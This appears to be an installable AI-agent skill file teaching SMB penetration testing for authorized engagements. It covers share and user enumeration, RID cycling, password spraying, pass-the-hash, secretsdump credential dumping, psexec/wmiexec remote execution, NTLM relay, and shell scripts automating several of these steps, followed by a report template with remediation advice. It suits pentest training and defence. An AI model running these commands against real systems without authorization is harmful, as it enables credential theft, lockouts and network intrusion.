pentesting-smb

```bash
npx mdskill add xalgord/xalgorix/pentesting-smb
```

---
name: pentesting-smb
description: Testing SMB/CIFS file-sharing services (TCP 445, and 139 over NetBIOS) on Windows and Samba hosts during
  authorized engagements. Covers share enumeration, null/guest session abuse, user and RID enumeration, credentialed
  access with netexec/crackmapexec, password spraying, command execution (psexec/wmiexec/smbexec/atexec), SAM/LSA
  dumping, and notable CVEs such as EternalBlue (MS17-010).
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- smb
- cifs
- active-directory
- lateral-movement
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Pentesting SMB (port 445/139)

## When to Use

- During authorized internal network or Active Directory penetration tests when TCP 445 or 139 is open
- When you need to enumerate shares, users, groups, and the domain password policy
- When testing for anonymous/null sessions, guest access, and default credentials
- When you have credentials (or NT hashes) and want to access shares, dump secrets, or move laterally
- When assessing Samba servers on Linux/Unix for dangerous `smb.conf` misconfigurations

## Quick Enumeration

```bash
# Version and vuln scan (also fingerprints OS)
nmap --script "safe or smb-enum-*" -p 445 <IP>
nmap --script smb-os-discovery,smb-security-mode,smb2-security-mode -p 445 <IP>
nmap --script smb-vuln-ms17-010 -p 445 <IP>          # EternalBlue check

# Full enumeration via null/anon IPC$ session
enum4linux -a <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>

# netexec / crackmapexec (the modern workhorse)
netexec smb <IP>                                     # banner, signing, domain, OS
crackmapexec smb <IP> -u '' -p '' --shares           # null session shares
crackmapexec smb <IP> -u 'guest' -p '' --shares      # guest session shares

# rpcclient null session
rpcclient -U "" -N <IP>
```

## Critical: Checks Most Often Missed

1. **Null / anonymous session on IPC$** — connect with empty user and password. Often still yields OS info, parent domain, users, groups, shares, and the password policy via `enum4linux`/`enum4linux-ng`.
2. **Guest account access** — guest with a blank password frequently lists shares even when null does not.
3. **SMB signing not required** — enables SMB relay (NTLM relay) attacks. `netexec smb <IP>` reports `signing:False`.
4. **EternalBlue (MS17-010)** — unpatched SMBv1 remote code execution. Confirm with `nmap --script smb-vuln-ms17-010` or `crackmapexec smb <IP> -M ms17-010`. Do NOT run the exploit without explicit written authorization; the kernel pool overflow can crash the host.
5. **Readable SYSVOL/NETLOGON** — readable by all authenticated domain users. Hunt for Group Policy Preference XML (`Groups.xml`, `Services.xml`, `ScheduledTasks.xml`, `DataSources.xml`, `Drives.xml` with a `cpassword=` attribute, decryptable with the AES key Microsoft published), `Registry.xml` (plaintext autologon passwords), `web.config`, and logon scripts with embedded creds. Also test write access even on "read-only"-looking shares (NTFS ACLs may allow writes → logon-script poisoning).
6. **NTFS vs share ACL mismatch** — a share that looks read-only may still allow file writes. Always test by uploading a small file.

How to CONFIRM: a null session is confirmed when `smbclient -U '%' -N \\\\<IP>\\IPC$ -c ''` returns no error, or `crackmapexec smb <IP> -u '' -p '' --shares` lists shares. Treat `NT_STATUS_ACCESS_DENIED` as "share exists, no access" and `NT_STATUS_BAD_NETWORK_NAME` as "share does not exist."
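The confirmation logic above as a reusable script: it maps the `NT_STATUS_*` text that `smbclient` prints to a verdict, then tries a put/delete on every share that connected cleanly (check 6, the NTFS-vs-share ACL mismatch). This is an added example, not code from the original skill; the host, share names and the sample `smbclient` outputs used to exercise it are constructed placeholders.

```shell
# Map raw smbclient output (stdout+stderr) to a one-word verdict.
# NT_STATUS_BAD_NETWORK_NAME = share does not exist;
# NT_STATUS_ACCESS_DENIED    = share exists, this identity has no access.
classify_share_status() {
  case "$1" in
    *NT_STATUS_BAD_NETWORK_NAME*) echo "missing" ;;
    *NT_STATUS_ACCESS_DENIED*)    echo "denied" ;;
    *NT_STATUS_LOGON_FAILURE*)    echo "auth-failed" ;;   # credentials rejected
    *NT_STATUS_*)                 echo "error" ;;         # anything else, keep the raw text
    *)                            echo "readable" ;;      # connected and listed
  esac
}

# Connect as null user (default "%") or "user%pass" and classify the result.
# Usage: probe_share <ip> <share> [user%pass]
probe_share() {
  local ip="$1" share="$2" cred="${3:-%}" out
  out=$(smbclient -U "$cred" -N "//$ip/$share" -c 'ls' 2>&1 || true)
  classify_share_status "$out"
}

# Upload a tiny marker file and delete it again; prints writable/read-only.
# Usage: probe_write <ip> <share> [user%pass]
probe_write() {
  local ip="$1" share="$2" cred="${3:-%}" marker="pt-$$.txt" tmp
  tmp=$(mktemp) && echo "pentest write probe" > "$tmp"
  if smbclient -U "$cred" -N "//$ip/$share" -c "put $tmp $marker; del $marker" >/dev/null 2>&1; then
    echo "writable"
  else
    echo "read-only"
  fi
  rm -f "$tmp"
}

# Drive both probes over a list of share names read from stdin.
# Usage: printf 'IPC$\nADMIN$\nC$\nSYSVOL\nNETLOGON\n' | triage_shares 10.0.0.5 [user%pass]
triage_shares() {
  local ip="$1" cred="${2:-%}" share verdict
  while read -r share; do
    [ -n "$share" ] || continue
    verdict=$(probe_share "$ip" "$share" "$cred")
    if [ "$verdict" = "readable" ]; then
      verdict="$verdict/$(probe_write "$ip" "$share" "$cred")"
    fi
    printf '%-12s %s\n' "$share" "$verdict"
  done
}
```

`probe_write` deletes its marker immediately so the only trace left is the audit event; if the share is a logon-script location, a `writable` verdict is the finding itself and no further files should be dropped without explicit scope.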

## Workflow

### Step 1: Enumerate (shares, users, domain info)

```bash
# Shares (try null, then guest, then creds)
smbclient --no-pass -L //<IP>                         # null user
smbmap -H <IP>                                        # null user, shows perms
crackmapexec smb <IP> -u '' -p '' --shares

# Users / groups / password policy
crackmapexec smb <IP> --users [-u <user> -p <pass>]
crackmapexec smb <IP> --groups [-u <user> -p <pass>]
crackmapexec smb <IP> -u <user> -p <pass> --pass-pol
rpcclient -U "" -N <IP> -c 'enumdomusers'
rpcclient -U "" -N <IP> -c 'enumdomgroups'

# RID cycling / SID lookup to recover usernames
lookupsid.py -no-pass <DOMAIN>/@<IP>
crackmapexec smb <IP> -u 'guest' -p '' --rid-brute
```
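RID cycling done by hand with `rpcclient`, as an added example that is not part of the original skill (it also illustrates the "RID cycling" row of the Key Concepts table). It fetches the domain SID once from `lsaquery`, then resolves batches of `S-1-5-21-<domain>-<rid>` SIDs with `lookupsids` and keeps only entries whose SID type is 1 (user). The target address, credentials and the sample `lookupsids` output lines are constructed.

```shell
# Step 1: domain SID from a null (or guest) session. lsaquery prints a line
# "Domain Sid: S-1-5-21-..." which is all we need.
# Usage: get_domain_sid <ip> [user%pass]
get_domain_sid() {
  rpcclient -U "${2:-}" -N "$1" -c 'lsaquery' 2>/dev/null | awk '/Domain Sid:/ {print $3}'
}

# Step 2: parse lookupsids output. Resolved lines look like
#   S-1-5-21-<domain>-<rid> CORP\John Doe (1)
# The trailing number is the SID type: 1=user, 2=group, 4=alias,
# 5=well-known group, 9=computer, 8=unknown (RID not allocated).
# Emits "rid username" for user entries only; the DOMAIN\ prefix is stripped.
parse_lookupsids_users() {
  awk '$NF == "(1)" {
         n = split($1, parts, "-"); rid = parts[n]
         line = $0
         sub(/^[^ ]+ /, "", line)          # drop the SID
         sub(/ \([0-9]+\)$/, "", line)     # drop the "(type)" suffix
         sub(/^[^\\]*\\/, "", line)        # drop DOMAIN\
         print rid, line
       }'
}

# Step 3: cycle RIDs, 50 SIDs per RPC call, so 600 RIDs cost ~12 round trips.
# Usage: rid_cycle <ip> <domain_sid> [user%pass] [start] [end]
rid_cycle() {
  local ip="$1" sid="$2" cred="${3:-}" start="${4:-500}" end="${5:-1100}"
  local rid batch=""
  for rid in $(seq "$start" "$end"); do
    batch="$batch $sid-$rid"
    if [ $(( (rid - start + 1) % 50 )) -eq 0 ] || [ "$rid" -eq "$end" ]; then
      rpcclient -U "$cred" -N "$ip" -c "lookupsids$batch" 2>/dev/null | parse_lookupsids_users
      batch=""
    fi
  done
}

# Example run (constructed target):
#   sid=$(get_domain_sid 10.0.0.5)
#   rid_cycle 10.0.0.5 "$sid" "" 500 1100 | awk '{print $2}' > users.txt
```

Batching matters on a hardened DC: each `lookupsids` call is one LSARPC request, and a per-RID loop of 600 calls is both slow and easy to spot. Raise the end RID when the domain is large; user RIDs continue past 1100 in any domain that has created more than a few hundred principals.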

### Step 2: Authenticate (null session, default creds, password spray)

```bash
# Default / weak creds worth trying: blank, guest/blank, admin/(blank|password|admin)

# Validate a single credential pair
crackmapexec smb <IP> -u 'user' -p 'Password1'         # (+) = valid, Pwn3d! = admin

# Password spray across a user list (mind lockout policy!)
crackmapexec smb <IP> -u users.txt -p 'Spring2024!' --continue-on-success

# Pass-the-Hash
crackmapexec smb <IP> -u Administrator -H <NTHASH>
smbmap -u "username" -p "<LM>:<NT>" -H <IP>            # PtH with smbmap (hash format is LMHASH:NTHASH)

# Kerberos auth (NTLM disabled environments → STATUS_NOT_SUPPORTED); target by FQDN, not IP
sudo ntpdate <dc.fqdn>                                 # avoid KRB_AP_ERR_SKEW (clock must match the DC)
netexec smb <dc.fqdn> -k                               # use ccache TGT (--use-kcache on newer netexec)
smbclient --kerberos //ws01.domain.com/C$              # Samba >= 4.15: --use-kerberos=required
```
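A lockout-aware spray wrapper for Step 2, added here as an example rather than taken from the original skill. It turns the lockout threshold from `--pass-pol` into an attempt budget (threshold minus one, so a legitimate mistyped password does not tip an account over), sleeps out the observation window between rounds, and extracts valid logins from crackmapexec's own result lines. The DC address, domain, policy values and the sample output lines are constructed.

```shell
# Attempts allowed per user inside one observation window.
# threshold 0 means no lockout policy: return 0 = unlimited.
spray_budget() {
  if [ "$1" -le 0 ]; then echo 0; else echo $(( $1 - 1 )); fi
}

# Parse crackmapexec/netexec result lines into "user:password[:admin]".
#   SMB 10.0.0.5 445 DC01 [+] corp.local\jdoe:Spring2024! (Pwn3d!)
#   SMB 10.0.0.5 445 DC01 [-] corp.local\asmith:Spring2024! STATUS_LOGON_FAILURE
parse_spray_hits() {
  awk '$1 == "SMB" && $5 == "[+]" {
         cred = $6; sub(/^[^\\]*\\/, "", cred)      # drop DOMAIN\ prefix
         flag = ($0 ~ /Pwn3d!/) ? ":admin" : ""     # local admin on the target
         print cred flag
       }'
}

# Spray one password per round; after <budget> rounds, wait out the window.
# Usage: spray <dc_ip> <domain> <users.txt> <lockout_threshold> <window_minutes> <pw1> [pw2 ...]
spray() {
  local dc="$1" domain="$2" users="$3" threshold="$4" window="$5"; shift 5
  local budget used=0 pw
  budget=$(spray_budget "$threshold")
  for pw in "$@"; do
    if [ "$budget" -gt 0 ] && [ "$used" -ge "$budget" ]; then
      echo "[*] $budget attempts used in this window; sleeping ${window}m" >&2
      sleep $(( window * 60 )); used=0
    fi
    crackmapexec smb "$dc" -d "$domain" -u "$users" -p "$pw" --continue-on-success 2>/dev/null \
      | parse_spray_hits | tee -a spray-hits.txt
    used=$(( used + 1 ))
  done
}

# Example (constructed policy: threshold 5, window 30 min):
#   spray 10.0.0.5 corp.local users.txt 5 30 'Spring2024!' 'Summer2024!' 'Welcome1'
```

The budget counts rounds, not users: every round sends exactly one attempt to each account in `users.txt`, so the per-account counter is the same as the round counter. Re-run `--pass-pol` first if the engagement spans days; a policy change mid-spray is the usual way a list of locked accounts ends up in the report.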

### Step 3: Exploit / Extract (share access, secrets dumping)

```bash
# Connect to a share and pull files
smbclient --no-pass //<IP>/<Share>
smbclient //<IP>/<share> -c 'recurse; prompt; mget *'  # download everything
smbmap -R <Share> -H <IP> -A '<FileName>' -q           # search + download

# Try common hidden shares
smbclient -U '%' -N \\\\<IP>\\ADMIN$                    # also C$, IPC$, SYSVOL, NETLOGON

# Spider shares for secrets
crackmapexec smb <IP> -u user -p pass -M spider_plus --share 'Department Shares'

# Dump credentials with valid (admin) creds
crackmapexec smb <IP> -u Administrator -p 'pass' --sam   # local SAM hashes
crackmapexec smb <IP> -u Administrator -p 'pass' --lsa   # LSA secrets
secretsdump.py [[domain/]username[:password]@]<IP>       # impacket full dump

# Remote registry read
reg.py domain.local/USERNAME@<IP> -hashes <LM:NT> query -keyName HKLM -s
```

### Step 4: Post-access / lateral movement

```bash
# Command execution (CME/netexec try wmiexec first by default and fall back to the others)
crackmapexec smb <IP> -u Administrator -p 'pass' -x whoami
crackmapexec smb <IP> -u Administrator -H <NTHASH> -x whoami
# --exec-method {mmcexec,smbexec,atexec,wmiexec}

# Impacket interactive shells (kali: /usr/share/doc/python3-impacket/examples/)
psexec.py [[domain/]username[:password]@]<IP>            # uploads a service binary, new service via \pipe\svcctl (noisy)
wmiexec.py [[domain/]username[:password]@]<IP>           # DCOM over TCP 135; no binary dropped, output read back via ADMIN$
smbexec.py [[domain/]username[:password]@]<IP>           # cmd/powershell via a short-lived service, no binary dropped
atexec.py  [[domain/]username[:password]@]<IP> "whoami"  # Task Scheduler \pipe\atsvc
# All support -hashes <LM:NT> for PtH and -k for Kerberos

# SMB relay (when signing not required): capture + relay NTLM
# needs an inbound NTLM authentication (poisoned name resolution or coercion);
# a host cannot be relayed back to itself, so targets.txt must list other hosts
ntlmrelayx.py -tf targets.txt -smb2support
```
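Building the relay target list from saved netexec/crackmapexec banner output, as an added example that is not part of the original skill. netexec can do this live with `--gen-relay-list`; the point here is the selection logic itself, so a banner sweep captured earlier in the engagement can be reused without rescanning. The sample banner lines and addresses are constructed.

```shell
# A netexec banner line (whitespace-separated fields):
#   SMB  10.0.0.5  445  DC01  [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
# Emit "ip name domain smbv1" for every host where signing is not required.
relay_candidates() {
  awk '$1 == "SMB" && /\(signing:False\)/ {
         ip = $2; name = ""; domain = ""; smbv1 = "?"
         if (match($0, /\(name:[^)]*\)/))   name   = substr($0, RSTART + 6, RLENGTH - 7)
         if (match($0, /\(domain:[^)]*\)/)) domain = substr($0, RSTART + 8, RLENGTH - 9)
         if (match($0, /\(SMBv1:[^)]*\)/))  smbv1  = substr($0, RSTART + 7, RLENGTH - 8)
         print ip, name, domain, smbv1
       }'
}

# Reduce to unique IPs, one per line, in the shape ntlmrelayx -tf expects.
# Usage: relay_candidates < netexec.log | write_relay_targets targets.txt
write_relay_targets() {
  awk '{print $1}' | sort -u > "$1"
}

# Full pipeline (constructed subnet):
#   netexec smb 10.0.0.0/24 | tee netexec.log
#   relay_candidates < netexec.log | write_relay_targets targets.txt
#   ntlmrelayx.py -tf targets.txt -smb2support
```

Keep the name and domain columns in the report: a relay finding is only meaningful per host, and the `SMBv1:True` column doubles as the shortlist for the MS17-010 check from the Critical section.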

## Key Concepts

| Concept | Description |
|---------|-------------|
| **SMB / CIFS** | Application-layer protocol for shared access to files, printers, and named pipes; runs on TCP 445 (direct) or 139 (NetBIOS) |
| **Null session** | Anonymous IPC$ connection with empty username/password; exposes services over named pipes |
| **IPC$** | Inter-process communication share used to interact with named pipes (lsarpc, samr, srvsvc) |
| **Pass-the-Hash (PtH)** | Authenticating with an NT hash instead of a cleartext password |
| **SMB signing** | Integrity protection; when not required, NTLM relay attacks become possible |
| **RID cycling** | Enumerating users by brute-forcing relative IDs (500–~1100) via SID lookups |
| **SYSVOL/NETLOGON** | Domain shares readable by authenticated users; common source of GPP/script credentials |
| **EternalBlue (MS17-010)** | SMBv1 kernel pool overflow giving unauthenticated remote code execution |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| **nmap** (smb-* NSE) | Version detection, security mode, MS17-010 vuln check |
| **netexec / crackmapexec** | Share/user/group enum, spraying, PtH, secrets dump, command exec |
| **enum4linux-ng** | Aggregated null-session enumeration (OS, domain, users, shares, policy) |
| **rpcclient** | Manual MSRPC queries (enumdomusers, enumdomgroups, queryuser) |
| **smbclient / smbmap** | Share listing, file transfer, recursive search and download |
| **impacket** | psexec/wmiexec/smbexec/atexec, secretsdump, samrdump, lookupsid, reg, ntlmrelayx |
| **Snaffler / ShareHound** | Automated discovery of sensitive files and share ACLs across the domain |

## Common Scenarios

### Scenario 1: Anonymous Enumeration
A host allows null sessions. `enum4linux-ng -A <IP>` reveals the domain name, full user list, group memberships, and password policy — providing a user list for targeted password spraying.

### Scenario 2: GPP Password in SYSVOL
A domain user can read `\\<dc>\SYSVOL\<domain>\Policies\...\Registry.xml` containing an autologon password configured via Group Policy, granting workstation access.

### Scenario 3: Pass-the-Hash Lateral Movement
A dumped local Administrator NT hash is reused across the subnet. `crackmapexec smb <subnet> -u Administrator -H <hash>` flags hosts as `Pwn3d!`, and `wmiexec.py -hashes :<hash> Administrator@<IP>` yields a shell.

### Scenario 4: EternalBlue Target
`nmap --script smb-vuln-ms17-010` flags an unpatched server. With written authorization, the host is exploited for SYSTEM-level RCE; otherwise it is reported as a critical finding only.

## Output Format

```
## SMB Finding

**Service**: SMB/CIFS
**Severity**: <Critical|High|Medium|Low>
**Host**: <IP>:445
**Access Level**: <null | guest | authenticated | admin>

### Summary
<What was found: null session, weak creds, MS17-010, exposed share, etc.>

### Evidence
- Command: <exact command run>
- Output: <relevant signature, e.g. share list, "Pwn3d!", root: line, MS17-010 VULNERABLE>

### Affected Resources
| Share / Object | Access | Notable Contents |
|----------------|--------|------------------|
| SYSVOL | read | Registry.xml with GPP password |
| C$ | read/write (admin) | full filesystem |

### Reproduction Steps
1. <step>
2. <step>

### Recommendation
1. Disable null/anonymous sessions and the guest account
2. Require SMB signing on all hosts
3. Patch MS17-010 / disable SMBv1
4. Remove credentials from SYSVOL scripts and GPP; rotate exposed secrets
5. Enforce strong, unique local administrator passwords (LAPS)
```
